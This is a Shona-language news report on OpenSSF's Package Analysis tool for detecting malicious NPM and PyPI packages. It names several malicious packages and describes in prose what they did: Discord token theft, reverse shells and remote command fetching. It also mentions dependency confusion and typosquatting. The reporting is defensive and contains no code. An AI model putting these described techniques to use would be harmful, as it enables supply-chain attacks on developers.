Sangano reOpenSSF (Open Source Security Foundation), rakaumbwa nesangano iri Linux Foundation, iyo ine chinangwa chekuvandudza kuchengetedzeka kwesoftware inowanikwa pachena, yakapa chirongwa cheOpen-Source Package Analysis, icho chinogadzira sisitimu yekuongorora mapakeji ekodhi ine njodzi. Kodhi yepurojekiti iyi yakanyorwa muGo uye inogoverwa pasi peApache 2.0 rezinesi. Kuongororwa kwekutanga kwenzvimbo dzeNPM nePyPI uchishandisa toolkit yakarongwa kwakawana mapakeji ane njodzi anopfuura mazana maviri asina kuonekwa.
Mazhinji emapakeji ane dambudziko anoonekwa anoshandisa nzira dzemazita nemukati dzisiri dzeruzhinji purojekiti (dependency confusion attack) kana kushandisa typosquatting nzira (kugovera mazita akafanana nemaraibhurari anozivikanwa), uye zvakare kufonera zvinyorwa panguva yekuisa iyo inowana ekunze mauto. Sekureva kwevagadziri vePackage Analysis, mazhinji emapakeji ane dambudziko akaonekwa anogona kunge akagadzirwa nevaongorori vezvekuchengetedza vari kutora chikamu muzvirongwa zvebug bounty, sezvo data inotumirwa inongogumira kumushandisi uye zita rehurongwa, uye zviito zvinoitwa zvakajeka, pasina kuedza kuvanza maitiro avo.
Pakati pemapakeji ane hutsinye chiitiko, zvinotevera zvinocherechedzwa:
- Pakeji yediscordcmd PyPI yakawanikwa ichitumira zvikumbiro zvisingawanzoitiki ku raw.githubusercontent.com, Discord API, uye ipinfo.io. Pakeji iyi yakadhawunirodha kodhi yekumashure kubva kuGitHub ndokuiisa mudhairekitori. Windows- Mutengi weDiscord, mushure mezvo akatanga nzira yekutsvaga matoni eDiscord muhurongwa hwemafaira uye kuatumira kune sevha yeDiscord yekunze inodzorwa nevanorwisa.
- NPM package colorss, iyo yakaedzawo kutumira kune external server tokeni kubva kuaccount yeDiscord.
- NPM package @roku-web-core/ajax - panguva yekumisikidza yakatumira data nezve sisitimu uye yakatanga chibatiso (reverse shell) chinogamuchira chekunze chinongedzo uye chinomhanyisa mirairo.
- PyPI package secrevthree - yakamhanyisa reverse shell painopinza imwe module.
- NPM package random-vouchercode-jenareta - mushure mekutumira raibhurari, yakatumira chikumbiro kune yekunze server, iyo yakadzosa murairo uye nguva yainofanira kuitwa.
Package Analysis 'basa rinodzika kusvika pakuongorora kodhi kodhi mapakeji ekumisikidza network yekubatanidza, kuwana mafaera, uye inomhanya mirairo. Pamusoro pezvo, shanduko yemamiriro emapakeji inotariswa kuti ione kana kuisa kwakashata kwakawedzerwa kune imwe yekuburitswa kwesoftware isingakuvadze. Kutarisa kutaridzika kwemapakeji matsva mumatura uye shanduko kumapakeji akamboiswa, iyo Package Feeds toolkit inoshandiswa, kubatanidza basa neNPM, PyPI, Go, RubyGems, Packagist, NuGet, uye Crate repositories.
Package Analysis inosanganisira zvinhu zvitatu zvakakosha zvinogona kushandiswa pamwe chete kana zvakasiyana:
- Scheduler yekumhanyisa mapakeji ekuongorora mabasa zvichienderana nedata kubva kuPackage Feeds.
- Analyzer inotarisa zvakananga pasuru uye inoongorora maitiro ayo ichishandisa static ongororo uye ine simba yekutevera nzira. Cheki inoitwa munzvimbo iri yoga.
- Iyo yekurodha inoisa iyo scanner mhinduro muBigQuery chengetedzo.
Source: opennet.ru
